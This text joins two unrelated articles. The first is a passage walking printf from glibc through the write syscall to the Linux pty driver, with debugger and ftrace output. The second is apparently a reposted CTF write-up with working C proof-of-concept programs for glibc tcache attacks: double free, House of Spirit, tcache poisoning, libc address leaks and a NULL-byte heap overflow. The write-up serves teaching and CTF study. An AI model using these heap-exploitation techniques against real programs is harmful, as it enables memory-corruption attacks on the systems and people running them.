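To make that relationship concrete, here is a minimal sketch of my own (not glibc’s actual source) showing how a printf-style wrapper collapses into vfprintf:

#include <stdarg.h>
#include <stdio.h>

/* Collect the variadic arguments into a va_list and let vfprintf do all of
   the formatting and buffered writing to stdout. */
int my_printf(const char *format, ...)
{
  va_list ap;
  va_start(ap, format);
  int done = vfprintf(stdout, format, ap);
  va_end(ap);
  return done;
}

Everything interesting (parsing, buffering, the eventual write) happens inside that single vfprintf call.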

These high-level print functions obey buffering rules defined on the stream descriptor. The output string is constructed in the buffer using internal glibc (libio) functions. Finally, write is the final step before handing work to the kernel. If you aren’t familiar with how these work, I recommend reading about the glibc way of managing I/O.

Bonus: Some extra reading about buffering with nice diagrams
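If you want to see the buffering rules influence behavior yourself, a small experiment (my own sketch, not from the article) is to change stdout’s buffering mode and re-run the program under strace:

#include <stdio.h>

int main(void)
{
  /* stdout attached to a terminal is normally line buffered; forcing it to
     unbuffered means each printf reaches the write syscall immediately. */
  setvbuf(stdout, NULL, _IONBF, 0);
  printf("Hello World %d\n", 1);
  return 0;
}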

Let’s trace our path through the standard library

printf() execution sequence:

$ gdb ./printf1_s
...
main at printf1.c:5
5  printf("Hello World %d\n", 1);
0x400e02  5  printf("Hello World %d\n", 1);
0x401d30 in printf ()
0x414600 in vfprintf ()
0x40c110 in strchrnul ()
0x414692 in vfprintf ()
0x423c10 in _IO_new_file_xsputn ()
0x424ba0 in _IO_new_file_overflow ()
0x425ce0 in _IO_doallocbuf ()
0x4614f0 in _IO_file_doallocate ()
0x4235d0 in _IO_file_stat ()
0x40f8b0 in _fxstat ()              ### fstat syscall
0x461515 in _IO_file_doallocate ()
0x410690 in mmap64 ()               ### mmap syscall
0x46155e in _IO_file_doallocate ()
0x425c70 in _IO_setb ()
0x461578 in _IO_file_doallocate ()
0x425d15 in _IO_doallocbuf ()
0x424d38 in _IO_new_file_overflow ()
0x4243c0 in _IO_new_do_write ()
0x423cc1 in _IO_new_file_xsputn ()
0x425dc0 in _IO_default_xsputn ()
...cut 11 repeats of last 2 functions...
0x425e7c in _IO_default_xsputn ()
0x423d02 in _IO_new_file_xsputn ()
0x41475e in vfprintf ()
0x414360 in _itoa_word ()
0x4152bb in vfprintf ()
0x423c10 in _IO_new_file_xsputn ()
0x40b840 in mempcpy ()
0x423c6d in _IO_new_file_xsputn ()
0x41501f in vfprintf ()
0x40c110 in strchrnul ()
0x414d1e in vfprintf ()
0x423c10 in _IO_new_file_xsputn ()
0x40b840 in mempcpy ()
0x423c6d in _IO_new_file_xsputn ()
0x424ba0 in _IO_new_file_overflow ()
0x4243c0 in _IO_new_do_write ()
0x4235e0 in _IO_new_file_write ()
0x40f9c7 in write ()
0x40f9c9 in __write_nocancel ()     ### write syscall happens here
0x423623 in _IO_new_file_write ()
0x42443c in _IO_new_do_write ()
0x423cc1 in _IO_new_file_xsputn ()
0x414d3b in vfprintf ()
0x408450 in free ()
0x41478b in vfprintf ()
0x408450 in free ()
0x414793 in vfprintf ()
0x401dc6 in printf ()
main at printf1.c:6

This call trace shows the entire execution for this printf example. If you stare closely at it, you can follow this basic logic:

  • printf passes string and formats to vfprintf
  • vfprintf starts to parse and attempts its first buffered write
  • Oops — buffer needs to be allocated. Let’s find some memory
  • vfprintf back to parsing…
  • Copy some results to a final location
  • We’re done — call write()
  • Clean up this mess

Let’s look at some of the functions:

_IO_*: These functions are part of glibc’s libio module, which manages the internal stream buffer. Just looking at the names, we can guess that there is a lot of writing and memory allocation. The source code for most of these operations is in the files fileops.c and genops.c.

_fxstat pulls the state of file descriptors. Since this is system dependent, it’s located at /sysdeps/unix/sysv/linux/fxstat64.c.
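You can ask the same question from user space. A minimal sketch of mine (not the article’s), mirroring the fstat(1, …) line that shows up in the strace output:

#include <stdio.h>
#include <sys/stat.h>

int main(void)
{
  /* What kind of file is descriptor 1? On a terminal it is a character
     device (S_IFCHR), which is what the library checks before sizing the
     stdout buffer. */
  struct stat sb;
  if (fstat(1, &sb) == 0)
    printf("stdout is %s character device\n", S_ISCHR(sb.st_mode) ? "a" : "not a");
  return 0;
}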

The remaining functions are covered in detail in the next two steps.

Let’s dig more!


Step 7 — Format string resolved

Goal: Solve the format problem

Let’s think about our input string, Hello World %d\n. There are three distinct sections that need to be processed as we scan across it from left to right.

  • 'Hello World ' — simple put
  • %d — substitute the integer literal ‘1’
  • \n — simple put

Now referring back to our trace, we can find three code sections that suggest where to look for the formatting work:

0x400e02 5  printf("Hello World %d\n", 1);
0x401d30 in printf ()
0x414600 in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414692 in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering 'Hello World '
...
0x41475e in vfprintf ()
0x414360 in _itoa_word ()          # converting integer
0x4152bb in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '1'
...
0x41501f in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414d1e in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '\n'
...

A few function calls after that final vfprintf() call is the hand off to the kernel. The formatting must have happened in vfprintf between the instructions indicated above. All substitutions handed pointers to the finished string to libio for line buffering. Let’s take a peek at the first round only:

The hand off to xsputn requires vfprintf to identify the start location in the string and a size. The start is already known (the current position), but it’s up to strchrnul() to find a pointer to the start of the next ‘%’ or the end of the string. We can follow the parsing rules in the glibc source code (/stdio-common/printf-*).

from glibc/stdio-common/printf-parse.h:

/* Find the next spec in FORMAT, or the end of the string.  Returns
   a pointer into FORMAT, to a '%' or a '\0'.  */
__extern_always_inline const unsigned char *
__find_specmb (const unsigned char *format)
{
  return (const unsigned char *) __strchrnul ((const char *) format, '%');
}

Or we can look in the compiled binary (my preferred timesink):

in vfprintf:
  0x414668 <+104>: mov    esi,0x25   # Setting ESI to the '%' symbol
  0x41466d <+109>: mov    rdi,r12    # Pointing RDI to the format string
  ...saving arguments...
  0x41468d <+141>: call   0x40c110 <strchrnul> # Search for next % or end

in strchrnul:
  0x40c110 <+0>: movd   xmm1,esi   # Loading up an SSE register with '%'
  0x40c114 <+4>: mov    rcx,rdi    # Moving the format string pointer
  0x40c117 <+7>: punpcklbw xmm1,xmm1 # Vector-izing '%' for a fast compare
  ...eventual return of a pointer to the next token...

Long story short, we’ve located where formats are found and processed.
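If you want to play with the same primitive from user code, here is a small sketch of my own (strchrnul is a GNU extension, hence the _GNU_SOURCE define):

#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>

int main(void)
{
  /* strchrnul returns a pointer to the next '%' or, failing that, to the
     terminating NUL -- the same split vfprintf relies on. */
  const char *format = "Hello World %d\n";
  const char *spec = strchrnul(format, '%');
  printf("literal prefix is %td bytes long\n", spec - format); /* 12 */
  return 0;
}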

That’s going to be the limit of peeking at source code for glibc. I don’t want this article to become an ugly mess. In any case, the buffer is ready to go after all three format processing steps.


Step 8 — Final string written to standard output

Goal: Follow events leading up to the kernel syscall

The formatted string, “Hello World 1”, now lives in a buffer as part of the stdout file stream. stdout to a console is usually line buffered, but exceptions do exist. All cases for console stdout eventually lead to the ‘write’ syscall, which is prototyped for the particular system. UNIX(-like) systems conform to the POSIX standard, if only unofficially. POSIX defines the write syscall:

ssize_t write(int fildes, const void *buf, size_t nbyte);

From the trace in step 6, recall that the functions leading up to the syscall are:

0x4235e0 in _IO_new_file_write ()  # libio/fileops.c
0x40f9c7 in write ()               # sysdeps/unix/sysv/linux/write.c
0x40f9c9 in __write_nocancel ()    # various macros in libc and linux
  ### write syscall happens here

The link between the compiler and operating system is the ABI, which is architecture dependent. That’s why we see a jump from libc’s libio code to our test case’s architecture code under (glibc)/sysdeps. When your standard library and OS are compiled for your system, these links are resolved and only the applicable ABI remains. The resulting write call is best understood by looking at the object code in our program (printf1_s).

First, let’s tackle one of the common complaints from beginners reading glibc source code: the 1000 different ways write() appears. At the binary level, this problem goes away after static linking. In our case, write() == __write() == __libc_write()

$ nm printf1_s | grep write
6b8b20 D _dl_load_write_lock
41f070 W fwrite
400575 t _i18n_number_rewrite
40077f t _i18n_number_rewrite
427020 T _IO_default_write
4243c0 W _IO_do_write
4235e0 W _IO_file_write
41f070 T _IO_fwrite
4243c0 T _IO_new_do_write
4235e0 T _IO_new_file_write
421c30 T _IO_wdo_write
40f9c0 T __libc_write     ## Real write in symbol table
43b220 T __libc_writev
40f9c0 W write            ## Same address -- weak symbol
40f9c0 W __write          ## Same address -- weak symbol
40f9c9 T __write_nocancel
43b220 W writev
43b220 T __writev

So any reference to these symbols actually jumps to the same executable code. For what it’s worth, writev() == __writev(), and fwrite() == _IO_fwrite

And what does __libc_write look like…?

000000000040f9c0 <__libc_write>:
  40f9c0:  83 3d c5 bb 2a 00 00   cmpl   $0x0,0x2abbc5(%rip)  # 6bb58c <__libc_multiple_threads>
  40f9c7:  75 14                  jne    40f9dd <__write_nocancel+0x14>

000000000040f9c9 <__write_nocancel>:
  40f9c9:	b8 01 00 00 00       	mov    $0x1,%eax
  40f9ce:	0f 05                	syscall 
  ...cut...

write simply checks the threading state and, assuming all is well, moves the write syscall number (1) into EAX and enters the kernel.

Some notes:

  • x86-64 Linux write syscall is 1, old x86 was 4
  • rdi refers to stdout
  • rsi points to the string
  • rdx is the string size count
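Those three registers line up exactly with the POSIX prototype from earlier. As a minimal sketch of my own (not part of the article), the same syscall can be made directly from C, skipping the stdio machinery entirely:

#include <unistd.h>

int main(void)
{
  /* fd 1 is stdout, the buffer holds the finished string, and 14 is its
     length -- mirroring rdi, rsi and rdx above. */
  write(1, "Hello World 1\n", 14);
  return 0;
}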

Step 9 — Driver writes output string

Goal: Show the execution steps from syscall to driver

Now we’re in the kernel with rdi, rsi, and rdx holding the call parameters. Console behavior in the kernel depends on your current environment. Two opposing cases are if you’re printing to native console/CLI or in a desktop pseudoterminal, such as GNOME Terminal.

I tested both types of terminals on my system and I’ll walk through the desktop pseudoterminal case. Counter-intuitively, the desktop environment is easier to explain despite the extra layers of work. The PTY is also much faster: the process has exclusive use of the pty, whereas many processes are aware of (and contend for) the native console.

We need to track code execution within the kernel, so let’s give Ftrace a shot. We’ll start by making a short script that activates tracing, runs our program, and deactivates tracing. Although execution only lasts for a few milliseconds, that’s long enough to produce tens or hundreds of thousands of lines of kernel activity.

#!/bin/sh
echo function_graph > /sys/kernel/debug/tracing/current_tracer
echo 1 > /sys/kernel/debug/tracing/tracing_on
./printf1_s
echo 0 > /sys/kernel/debug/tracing/tracing_on
cat /sys/kernel/debug/tracing/trace > output

Here is what happens after our static-linked printf executes the write syscall in a GNOME Terminal:

7)           | SyS_write() {
7)           |  vfs_write() {
7)           |   tty_write() {
7) 0.053 us  |    tty_paranoia_check();
7)           |    n_tty_write() {
7) 0.091 us  |     process_echoes();
7)           |     add_wait_queue()
7) 0.026 us  |     tty_hung_up_p();
7)           |     tty_write_room()
7)           |     pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |       queue_work_on()
7)+10.288 us |      } /* tty_flip_buffer_push */
7)           |      tty_wakeup() 
7)+14.687 us |     } /* pty_write */
7)+57.252 us |    } /* n_tty_write */
7)+61.647 us |   } /* tty_write */
7)+64.106 us |  } /* vfs_write */
7)+64.611 us | } /* SyS_write */

This output has been culled to fit this screen. Over 1000 lines of kernel activity were cut within SyS_write, most of which were locks and the kernel scheduler. The total time spent in kernel is 65 microseconds. This is in stark contrast to the native terminal, which took over 6800 microseconds!

Now is a good time to step back and think about how pseudoterminals are implemented. As I was researching a good way to explain it, I happened upon an excellent write up by Linus Åkesson. He explains far better than I could. This diagram he drew up fits our case perfectly.

The TL;DR version is that pseudoterminals have a master and a slave side. A TTY driver provides the slave functionality while the master side is controlled by a terminal process.
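A quick way to see the master/slave split from user space is to create a pair yourself. This is a minimal sketch of mine using standard POSIX calls, not something from the original article:

#define _XOPEN_SOURCE 600
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

int main(void)
{
  /* Ask the kernel for a pseudoterminal master, then reveal the slave path.
     A terminal emulator keeps the master fd and hands the slave (/dev/pts/N)
     to the shell as stdin/stdout/stderr. */
  int master = posix_openpt(O_RDWR | O_NOCTTY);
  if (master < 0 || grantpt(master) < 0 || unlockpt(master) < 0)
  {
    perror("pty setup");
    return 1;
  }
  printf("slave side is %s\n", ptsname(master));
  return 0;
}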

Let’s demonstrate that on my system. Recall that I’m testing through a gnome-terminal window.

$ ./printf1_s
Hello World 1
^Z
[1]+  Stopped                 ./printf1_s
$ top -o TTY
printf tty/pts usage

bash is our terminal parent process using pts/0. The shell forked (cloned) top and printf. Both inherited the bash stdin and stdout.

Let’s take a closer look at the pts/0 device the kernel associates with our printf1_s process.

$ ls -l /dev/pts/0
crw--w----. 1 maizure tty 136, 0 Apr  1 09:55 /dev/pts/0

Notice that the pseudoterminal itself is associated with a regular tty device. It also has a major number 136. What’s that?

From this Linux kernel version’s source, include/uapi/linux/major.h:

...
#define UNIX98_PTY_MASTER_MAJOR	128
#define UNIX98_PTY_MAJOR_COUNT	8
#define UNIX98_PTY_SLAVE_MAJOR	(UNIX98_PTY_MASTER_MAJOR+UNIX98_PTY_MAJOR_COUNT)
...

Yes, this major number is associated with a pseudoterminal slave (Master = 128, Slave = 128 + 8 = 136). A tty driver is responsible for its operation. If we revisit our write syscall trace, this makes sense:

...cut from earlier
7)           |  pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |          queue_work_on()
7)+10.288 us |      }
7)           |      tty_wakeup() 
7)+14.687 us |  } /* pty_write */
...

The pty_write() function invokes tty_* operations, which we assume moves ‘Hello World 1’ to the console. So where is this console?


Step 10 — Console output buffer is updated

Goal: Put the string to the console attached to stdout

The first argument to pty_write is struct tty_struct *tty. This struct contains the console, which is created with each unique tty process. In this case, the parent terminal created the pts/0 console and each child simply points to it.

The tty has many interesting parts to look at: line discipline, driver operations, the tty buffer(s), the tty_port. In the interest of space, I’m not going to cover tty initialization since it’s not on the direct path for printf — the process was created, the tty exists, and it wants this ‘Hello World 1’ right now!

The string is copied to the input queue in tty_insert_flip_string_fixed_flag().

memcpy(tb->char_buf_ptr + tb->used, chars, space); 
memset(tb->flag_buf_ptr + tb->used, flag, space);
tb->used += space;
copied += space;
chars += space;

This moves the data and flags to the current flip buffer. The console state is updated and the buffer is pushed:

if (port->low_latency)
    flush_to_ldisc(&buf->work);
else
    schedule_work(&buf->work);

Then the line discipline is notified to add the new string to the output window in tty_wakeup(). The typical case involves a kernel work queue, which is necessarily asynchronous. The string is waiting in the buffer with the signal to go. Now it’s up to the PT master to process it.

Our master is the gnome-terminal, which manages the window context we see on screen. The buffer will eventually stream to the console on the kernel’s schedule. In a native console (not X server), this would be a segment of raw video memory. Once the pty master processes the new data…


Step 11 — Hello world!

Goal: Rejoice

$ ./printf1_s
Hello World 1

$

Success!
Now you know how it works on my system. How about yours?


FAQ

Why did you put this article together?
Recently, I was asked several times over a short period how certain functions are implemented, and I couldn’t find a satisfactory resource to point to. Many blog posts focus too much on digging through byzantine compiler source code. I found that approach unhelpful because the compiler and standard library are only one part of the problem. This system-wide approach gives beginners a foundation, a path to follow, and helpful experiments to adapt to their own use.

What did you leave out?
Too much! It’ll have to wait until ‘printf() in 2500 seconds’. In no particular order:

  • Details about how glibc implements buffering
  • Details of how the GNOME console manages the terminal context
  • Flip buffer mechanics for ttys (similar to video backbuffers)
  • More about Linux work queues used in the tty driver
  • More discussion of how this process varies among architectures
  • Last (and definitely least): Untangling the mess inside vfprintf

How did you get gdb to print out that trace in step 6?
I used a separate file for automating gdb input and captured the output to another file.

$cat gdbcmds
start
stepi
stepi
stepi
stepi
...about 1000 more stepi...

$gdb printf1_s -x gdbcmds > printf1_s_dump

children tcache: a single NULL byte buffer overflow on the heap

( Original text by  )

This article is intended for the people who already have some knowledge about heap exploitation. If you already know some heap attacks on glibc<2.26 it’ll be fully understandable to you. But if you don’t, don’t worry — I’ve tried to make this post approachable for everyone with just basic knowledge. If you really know nothing about the topic, I recommend heap-exploitation.

Tcache is an internal mechanism responsible for heap management. It was introduced in glibc 2.26 in 2017. Its objective is to speed up heap management. The older algorithms were not removed and are still used sometimes, for example for bigger chunks or when the appropriate tcache bin is full. But heap exploitation with this mechanism is a lot easier due to a lack of heap integrity checks.

The convention used in this post is that we call the pointer to the next chunk fd, and the pointer to the previous chunk bk, as they are originally called in a normal heap chunk.

Tcache overview

You can grab glibc 2.26 from here. All the source code that is interesting for us is located in the file malloc/malloc.c.

In this version of glibc two new functions were created:

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

Both of these functions can be called at the beginning of the functions _int_free and __libc_malloc. tcache_put is called when the requested size of the allocated region is not greater than 0x408 and the tcache bin appropriate for the given size is not full. The maximum number of chunks in one tcache bin is mp_.tcache_count and this variable is set to 7 by default. This variable is set here and its root is the following piece of code:

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

tcache_get is called when we request a chunk of a tcache bin size and the appropriate bin contains some chunks. Every tcache bin contains chunks of only one size. From the code above we can see that it is a singly linked list, similar to a fastbin: it contains only a pointer to the next chunk. Also, the list is LIFO, like in fastbins. But there is a difference: each tcache bin remembers how many chunks belong to it in the variable tcache->counts[tc_idx].
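For reference, the two structures these functions operate on are defined in the same malloc.c; the comments here are mine:

/* glibc 2.26, malloc/malloc.c: the per-thread cache is nothing more than a
   count and a singly linked list per bin. */
typedef struct tcache_entry
{
  struct tcache_entry *next;   /* forward pointer only: no bk, no size field */
} tcache_entry;

typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];           /* chunks currently in each bin */
  tcache_entry *entries[TCACHE_MAX_BINS]; /* head of each LIFO list */
} tcache_perthread_struct;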

What’s strange is that calloc doesn’t allocate from the tcache bins (you can verify this with the sketch below).
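A quick experiment of my own (behavior observed on a stock glibc 2.26+; addresses will vary) that makes this visible:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	void *a = malloc(0x38);
	free(a);                   // a now sits in the 0x40 tcache bin
	void *b = calloc(1, 0x38); // calloc bypasses tcache, so b differs from a
	void *c = malloc(0x38);    // malloc checks tcache first, so c equals a
	printf("%p %p %p\n", a, b, c);
}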

If you want to test how tcache behaves, you can use pwndbg and compile malloc_playground.

a@x:~/Desktop/how2heap_mycp$ gdb -q ./mp
pwndbg: loaded 170 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)


Reading symbols from ./mp...(no debugging symbols found)...done.
pwndbg> r
Starting program: /home/a/Desktop/how2heap_mycp/mp 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
> malloc 0x50
==> 0x555555559670
> malloc 0x50
==> 0x5555555596d0
> malloc 0x61
==> 0x555555559730
> free 0x555555559670
==> ok
> free 0x5555555596d0
==> ok
> free 0x555555559730
==> ok
> ^C
Program received signal SIGINT, Interrupt.
[...]
pwndbg> bins
tcachebins
0x60 [  2]: 0x5555555596d0 —▸ 0x555555559670 ◂— 0x0
0x70 [  1]: 0x555555559730 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
pwndbg> 

Tcache attacks

Due to a lack of integrity checks in tcache, many attacks are easier.

double free

Let’s consider a double free vulnerability as a first example:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	char *a = malloc(0x38);
	free(a);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

As a result, we get the same pointer twice.

On older glibc (<2.26), getting the same result is a bit more complicated:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%s","hello\n");
	char *a = malloc(0x38);
	char *b = malloc(0x38);
	free(a);
	free(b);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

output:

hello
0x602420
0x602460
0x602420

We additionally need to free another chunk in between because of this integrity check: we cannot add a chunk to a fastbin list when the same chunk is already on top. printf is called at the beginning because the program crashes otherwise; most likely this is because the first call to printf initializes its buffer by mallocing some memory.
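
For reference, the fastbin check that forces the extra free in between looks roughly like this in _int_free (paraphrased from glibc's malloc.c):

/* old is the current top of the fastbin we are about to push p onto. */
if (__builtin_expect (old == p, 0))
  malloc_printerr ("double free or corruption (fasttop)");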

House of Spirit

House of Spirit is also super easy:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long int var[10];
	var[1] = 0x40; // set the size of the chunk to 0x40

	free(&var[2]);
	char *a=malloc(0x38);
	printf("%p %p\n",a ,&var[2]);
}

output:

0x7fff899700c0 0x7fff899700c0

By freeing a never-allocated region we put it on a tcache bin list, and we get this region back when malloc is called with the appropriate size. This is useful when we have the ability to overwrite some pointer with a buffer overflow.

On older glibc we need to put in more effort because of this health check: we must create another fake chunk after the freed one, like here.
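
A minimal sketch of the older-glibc (fastbin) variant, under the assumption that the extra check only requires the size field of the next fake chunk to look sane:

#include <stdlib.h>
#include <stdio.h>

int main(void)
{
	unsigned long long fake[20] __attribute__((aligned(16)));

	fake[1] = 0x40;   /* size of the fake chunk: a valid fastbin size */
	fake[9] = 0x1234; /* size field of the *next* fake chunk (at offset 0x40); */
	                  /* it just has to pass the "> 2*SIZE_SZ, < system_mem" check */

	free(&fake[2]);   /* the fake chunk lands in the 0x40 fastbin */

	char *a = malloc(0x38);
	printf("%p %p\n", a, (void *)&fake[2]); /* same address */
}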

tcache/fastbin poisoning

If we want malloc to return a pointer to a controlled location, we can simply overwrite the pointer to the next chunk. We can forget about the integrity check that the older mechanism performs:

#include <stdlib.h>
#include <stdio.h>

char var[]="aaaaaaaaaaaaaaa";

int main()
{
	long *a = malloc(0x38);
	long *b = malloc(0x38);
	free(a);
	free(b);
	// tcache bin 0x38 contains: b -> a 
	b[0] = (long)var;
	// tcache bin 0x38 contains: b -> var
	malloc(0x38);
	// tcache bin 0x38 contains: var
	char *c=malloc(0x38);
	printf("%s\n",c);
}

output:

aaaaaaaaaaaaaaa

We cannot do this by freeing only one chunk, because each tcache bin remembers how many chunks belong to it.

libc leak

If we want to leak the libc address on glibc 2.26 we can do this:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long *a = malloc(0x1000);
	malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}  

This program prints the fd of a chunk inside the unsorted bin. The fd of the last chunk and the bk of the first chunk in the unsorted bin point into libc.

If we can only request allocations of at most 0x100 bytes, this won’t work, because the freed chunk won’t go to the unsorted bin list but to a tcache bin. The following works only on older glibc:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}

Fortunately, if we make the tcache bin full (its maximum capacity is 7 chunks), the deallocated chunk will be put in the unsorted bin:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long* t[7];
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	
	// make tcache bin full
	for(int i=0;i<7;i++)
		t[i]=malloc(0x100);
	for(int i=0;i<7;i++)
		free(t[i]);
	
	free(a);
	// a is put in an unsorted bin because the tcache bin of this size is full
	printf("%p\n",a[0]);
} 

tcache attacks summary

More attacks exist for glibc with tcache. For example, House of Force works the same way as before, and it’s easy to make overlapping chunks by overwriting a size field with a bigger value. Since tcache was introduced, heap exploitation has become much easier. The exception is a buffer overflow by a single NULL byte, as in the Children Tcache CTF task: there I used an old attack with chunks of smallbin size and prevented them from going into the tcache by making the tcache bins full.

Children Tcache overview

In this task we have 2 binaries: task and libc

The version of libc is 2.27 but there is no difference between 2.26 and 2.27 for us:

a@x:~/Desktop/children_tcache$ strings libc.so.6 | grep LIBC
[...]
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.

The decompiled binary looks like this:

unsigned __int64 new_heap()
{
  signed int i; // [rsp+Ch] [rbp-2034h]
  char *ptr; // [rsp+10h] [rbp-2030h]
  unsigned __int64 size; // [rsp+18h] [rbp-2028h]
  char s; // [rsp+20h] [rbp-2020h]
  unsigned __int64 v5; // [rsp+2038h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(&s, 0, 0x2010uLL);
  for ( i = 0; ; ++i )
  {
    if ( i > 9 )
    {
      puts(":(");
      return __readfsqword(0x28u) ^ v5;
    }
    if ( !pointers[i] )
      break;
  }
  printf("Size:");
  size = read_atoll();
  if ( size > 0x2000 )
    exit(-2);
  ptr = (char *)malloc(size);
  if ( !ptr )
    exit(-1);
  printf("Data:");
  read_data((__int64)&s, size);
  strcpy(ptr, &s);
  pointers[i] = ptr;
  sizes[i] = size;
  return __readfsqword(0x28u) ^ v5;
}

int show_heap()
{
  const char *v0; // rax
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v2 = read_atoll();
  if ( v2 > 9 )
    exit(-3);
  v0 = pointers[v2];
  if ( v0 )
    LODWORD(v0) = puts(pointers[v2]);
  return (signed int)v0;
}

int delete_heap()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v1 = read_atoll();
  if ( v1 > 9 )
    exit(-3);
  if ( pointers[v1] )
  {
    memset((void *)pointers[v1], 0xDA, sizes[v1]);
    free((void *)pointers[v1]);
    pointers[v1] = 0LL;
    sizes[v1] = 0LL;
  }
  return puts(":)");
}

TL;DR:

We can

  • create chunk on the heap and read data into it
  • delete a chunk
  • print data in a chunk

Everything is fine except the new_heap function, which is vulnerable to a buffer overflow by a single NULL byte: read_data reads up to size bytes and strcpy then appends a terminating NULL behind them. Before free, the area is filled with 0xDA bytes. We can have at most 10 chunks allocated at the same time, and the maximum requested size of a chunk is 0x2000.
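
A standalone sketch of that off-by-one (memset stands in for the task's read_data; the names are otherwise hypothetical):

#include <stdlib.h>
#include <string.h>
#include <stdio.h>

int main(void)
{
	size_t size = 0xf8;
	char s[0x2010];
	memset(s, 0, sizeof(s));
	memset(s, 'b', size);     /* "read" exactly `size` bytes of attacker data */

	char *ptr = malloc(size); /* chunk with exactly `size` usable bytes */
	strcpy(ptr, s);           /* copies the data plus a terminating NULL: that NULL
	                             lands at ptr[size], i.e. on the lowest byte of the
	                             next chunk's size field, clearing its PREV_INUSE bit */
	printf("wrote %zu data bytes + 1 NULL into a %zu-byte allocation\n", size, size);
}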

On older versions of glibc, this attack works:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // allocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c has prev_inuse=0 and prev_size=0x210, so it will consolidate
    // with a and b and be put in the unsorted bin
    free(c);

    // now we can allocate chunks from the area of  a|b|c
    char *A = malloc(0x108);
    char *B = malloc(0xF8);
    printf("A: %p\n",A); 
    printf("B: %p\n",B);

    free(b);
    // leak libc
    printf("B content: %p\n",((long*)B)[0]);
}

output:

a: 0x602010
b: 0x602120
A: 0x602010
B: 0x602120
B content: 0x7ffff7dd1b78

Normally, when we free a chunk of smallbin size, there is a check whether its neighbour is free; if so, the two are consolidated. When we free chunk c it consolidates with a and b for two reasons (the relevant glibc code is sketched right after this list):

  • We have cleared the PREV_INUSE bit of chunk c, so the allocator thinks that its previous neighbour is free.
  • We have set prev_size of chunk c to 0x210, which is the total size of chunks a and b.
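
Roughly, the backward-consolidation path in _int_free that these two conditions trigger (simplified from glibc's malloc.c):

/* consolidate backward */
if (!prev_inuse(p)) {                           /* PREV_INUSE bit of c is clear */
    prevsize = prev_size (p);                   /* attacker-controlled prev_size (0x210) */
    size += prevsize;
    p = chunk_at_offset(p, -((long) prevsize)); /* jump back over b and a */
    unlink(av, p, bck, fwd);                    /* take the old free chunk (a) off its bin */
}
/* ... the merged chunk then ends up in the unsorted bin ... */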

This attack can be shorter:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // allocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c has prev_inuse=0 and prev_size=0x210, so it will consolidate
    // with a and b and be put in the unsorted bin
    free(c);

    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A); 

    // leak libc
    printf("B content: %p\n",((long*)b)[0]);
}
output:

a: 0x602010
b: 0x602120
A: 0x602010
B content: 0x7ffff7dd1b78

Here we skipped the allocation and deletion of chunk B because it is not needed. After c is freed, we have one unsorted-bin chunk that spans the combined areas of a, b and c. After we allocate chunk A, the unsorted chunk splits into two parts: one part is returned by malloc, the other part remains in the unsorted bin and begins at the same place as b.

